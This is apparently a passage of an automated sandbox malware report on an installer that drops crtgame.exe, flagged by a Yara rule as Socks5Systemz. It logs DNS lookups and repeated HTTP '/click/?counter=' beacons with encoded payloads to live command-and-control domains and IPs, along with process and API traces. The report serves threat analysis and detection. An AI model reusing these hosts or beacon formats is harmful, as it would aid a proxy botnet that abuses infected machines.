Dec 14, 2024 13:24:02.607207060 CET	49981	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:02.732916117 CET	49981	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:02.733983040 CET	49984	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:02.853043079 CET	80	49981	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:02.853801966 CET	80	49984	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:02.855139017 CET	49981	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:02.859076023 CET	49984	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:02.862085104 CET	49984	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:02.982212067 CET	80	49984	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:04.131221056 CET	80	49984	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:04.131361961 CET	49984	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:04.240900040 CET	49984	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:04.241099119 CET	49989	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:04.360899925 CET	80	49989	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:04.361066103 CET	49989	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:04.361223936 CET	49989	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:04.363965988 CET	80	49984	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:04.364042044 CET	49984	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:04.480917931 CET	80	49989	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:05.637187958 CET	80	49989	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:05.637264013 CET	49989	80	192.168.2.6	185.237.206.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 13:22:55.698266029 CET	59083	53	192.168.2.6	194.49.94.194
Dec 14, 2024 13:22:56.708612919 CET	59083	53	192.168.2.6	194.49.94.194
Dec 14, 2024 13:22:57.707602024 CET	59083	53	192.168.2.6	194.49.94.194
Dec 14, 2024 13:22:59.723247051 CET	59083	53	192.168.2.6	194.49.94.194
Dec 14, 2024 13:23:03.744617939 CET	59083	53	192.168.2.6	194.49.94.194
Dec 14, 2024 13:23:07.740331888 CET	60762	53	192.168.2.6	152.89.198.214
Dec 14, 2024 13:23:08.019727945 CET	53	60762	152.89.198.214	192.168.2.6
Dec 14, 2024 13:23:47.958437920 CET	49197	53	192.168.2.6	45.155.250.90
Dec 14, 2024 13:23:48.206248999 CET	53	49197	45.155.250.90	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 14, 2024 13:22:55.698266029 CET	192.168.2.6	194.49.94.194	0x8fc4	Standard query (0)	dtxiplc.info	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:22:56.708612919 CET	192.168.2.6	194.49.94.194	0x8fc4	Standard query (0)	dtxiplc.info	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:22:57.707602024 CET	192.168.2.6	194.49.94.194	0x8fc4	Standard query (0)	dtxiplc.info	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:22:59.723247051 CET	192.168.2.6	194.49.94.194	0x8fc4	Standard query (0)	dtxiplc.info	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:23:03.744617939 CET	192.168.2.6	194.49.94.194	0x8fc4	Standard query (0)	dtxiplc.info	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:23:07.740331888 CET	192.168.2.6	152.89.198.214	0xd75f	Standard query (0)	dtxiplc.info	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:23:47.958437920 CET	192.168.2.6	45.155.250.90	0x8175	Standard query (0)	kruxjou.ua	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 14, 2024 13:23:08.019727945 CET	152.89.198.214	192.168.2.6	0xd75f	No error (0)	dtxiplc.info		94.232.249.187	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:23:48.206248999 CET	45.155.250.90	192.168.2.6	0x8175	No error (0)	kruxjou.ua		185.237.206.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dtxiplc.info

kruxjou.ua

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49849	94.232.249.187	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:08.638951063 CET	296	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1 Host: dtxiplc.info User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49880	94.232.249.187	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:21.783200979 CET	296	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1 Host: dtxiplc.info User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49912	94.232.249.187	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:34.938270092 CET	296	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1 Host: dtxiplc.info User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49944	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:48.329365015 CET	294	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:23:49.600816965 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:23:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49948	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:49.828118086 CET	294	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:23:51.107959986 CET	846	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:23:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 32 37 65 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 65 61 38 35 39 33 35 66 65 30 61 34 38 39 65 34 66 30 38 63 35 66 38 61 66 39 31 61 66 65 61 36 38 38 63 33 66 30 66 33 66 31 63 39 36 39 32 30 39 64 30 34 61 35 37 39 64 30 61 64 33 30 33 38 37 31 31 61 38 62 66 66 37 34 66 39 62 34 38 39 36 33 65 30 33 38 64 32 66 38 33 35 65 38 36 39 64 33 35 32 31 36 36 34 32 61 32 32 31 32 30 37 39 63 32 39 34 36 31 33 33 38 61 38 64 64 38 32 62 35 39 35 34 39 31 64 61 30 31 66 61 31 62 63 66 64 39 35 63 62 33 32 64 33 36 31 61 34 61 63 39 35 61 33 66 64 61 35 62 66 38 32 32 38 31 34 36 34 65 61 34 32 63 65 61 61 35 31 61 39 62 35 66 35 30 62 63 62 36 61 37 38 38 65 39 64 35 61 36 35 37 66 65 66 38 62 37 39 32 64 63 32 36 33 39 38 32 31 65 62 63 33 37 65 36 36 66 31 66 61 33 61 37 37 61 61 65 31 64 64 65 62 31 37 66 39 32 31 35 61 66 63 62 39 32 33 33 34 31 39 65 61 36 64 33 32 63 39 65 66 61 38 33 65 36 31 61 65 37 34 37 64 61 35 36 32 35 63 31 32 61 61 65 39 32 32 [TRUNCATED] Data Ascii: 27ede2ffe912c1a5259eb23643d6c0ea85935fe0a489e4f08c5f8af91afea688c3f0f3f1c969209d04a579d0ad3038711a8bff74f9b48963e038d2f835e869d35216642a2212079c29461338a8dd82b595491da01fa1bcfd95cb32d361a4ac95a3fda5bf82281464ea42ceaa51a9b5f50bcb6a788e9d5a657fef8b792dc2639821ebc37e66f1fa3a77aae1ddeb17f9215afcb9233419ea6d32c9efa83e61ae747da5625c12aae922ec57213494e96c3f6dff2717d41243ab568f4be203338add078643804e39f615148a149b7a6f3d4213e16113c47de04ce5d085ffe15043e81f1c1628e89d9900e4d37daac4568ecf972569ee2578d1de90040823bcaf3a22c5aee79ce65366aaf54f5f4d4022f1dc4a38ccbc7ee5179cc0b5dc35e4d8a7cd984241b5e34510ec7af41cb87d62b72db8d9d682212ba2444dcd93244121bb63e0
Dec 14, 2024 13:23:54.473417044 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:23:54.940037012 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:23:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49962	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:55.172550917 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:23:56.445116997 CET	702	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:23:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 31 65 65 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 66 30 65 35 35 38 32 34 65 30 65 64 39 65 37 61 36 39 32 62 65 61 35 32 63 63 31 36 34 36 61 37 64 35 62 63 66 64 36 35 61 64 63 34 39 34 37 64 32 34 64 39 33 35 38 66 36 34 62 65 65 61 63 66 37 34 39 39 62 35 63 39 36 33 39 30 31 39 33 32 35 38 61 35 63 38 36 39 65 33 61 33 63 36 64 34 37 61 37 33 66 32 32 37 36 63 61 39 64 36 36 32 64 38 38 38 39 64 30 33 32 35 32 34 63 38 65 64 66 30 37 65 37 31 33 63 63 64 62 34 32 62 30 32 36 33 35 31 63 35 34 63 62 35 63 32 61 64 61 35 38 66 35 32 32 38 35 34 31 35 39 61 61 32 63 66 34 61 34 31 63 39 37 35 32 35 39 61 32 62 37 61 33 38 32 66 66 64 35 62 61 35 37 65 30 66 39 61 39 39 39 64 39 32 37 32 37 38 33 31 31 62 38 33 61 65 61 37 31 31 39 61 30 62 32 37 38 61 37 31 64 64 64 62 34 37 64 38 36 31 30 61 39 64 35 39 33 33 63 34 33 39 39 62 38 64 31 32 37 39 64 65 32 38 30 66 65 31 65 66 63 35 38 64 66 35 30 32 66 64 62 32 38 61 65 39 37 32 [TRUNCATED] Data Ascii: 1eede2fe88e261d4749b96478393969f80739ff0e55824e0ed9e7a692bea52cc1646a7d5bcfd65adc4947d24d9358f64beeacf7499b5c96390193258a5c869e3a3c6d47a73f2276ca9d662d8889d032524c8edf07e713ccdb42b026351c54cb5c2ada58f522854159aa2cf4a41c975259a2b7a382ffd5ba57e0f9a999d927278311b83aea7119a0b278a71dddb47d8610a9d5933c4399b8d1279de280fe1efc58df502fdb28ae972fc07a0d4b469ad9ecd8e9786749253cab62f2b028283da8c57a662618e09b7a5a4ea657b5affcda3c3f13192944d207ce5d0b56ea16072083f8c37c8c88d6860d5631c5a9596ce3ff6c5796e3538518c70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49969	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:56.797583103 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:23:58.087806940 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:23:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49972	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:58.312782049 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:23:59.586838007 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:23:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49976	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:23:59.818037033 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:24:01.092442989 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:24:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49981	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:24:01.330245972 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:24:02.605206966 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:24:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49984	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:24:02.862085104 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:24:04.131221056 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:24:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49989	185.237.206.129	80	1812	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:24:04.361223936 CET	302	OUT	GET /click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22 HTTP/1.1 Host: kruxjou.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 13:24:05.637187958 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 12:24:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Target ID:	0
Start time:	07:22:00
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\wG1fFAzGfH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wG1fFAzGfH.exe"
Imagebase:	0x400000
File size:	7'240'000 bytes
MD5 hash:	439194C0AF02FD82C5540A082543090F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	07:22:00
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp" /SL5="$103C0,6985375,54272,C:\Users\user\Desktop\wG1fFAzGfH.exe"
Imagebase:	0x400000
File size:	704'000 bytes
MD5 hash:	F448D7F4B76E5C9C3A4EAFF16A8B9B73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\schtasks.exe" /Query
Imagebase:	0x820000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Program Files (x86)\CRTGame\crtgame.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
Imagebase:	0x400000
File size:	2'195'454 bytes
MD5 hash:	A158C99AA92F0E29ED84BB25976D4F7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net.exe" helpmsg 10
Imagebase:	0xc50000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Program Files (x86)\CRTGame\crtgame.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
Imagebase:	0x400000
File size:	2'195'454 bytes
MD5 hash:	A158C99AA92F0E29ED84BB25976D4F7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3368674379.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:22:03
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 helpmsg 10
Imagebase:	0x340000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	1499
Total number of Limit Nodes:	22

Executed Functions

Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409B42
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669

Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6

Strings

SetSearchPathMode, xrefs: 0040459F
kernel32.dll, xrefs: 0040457D
SetDllDirectoryW, xrefs: 00404589
SetProcessDEPPolicy, xrefs: 004045B5

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

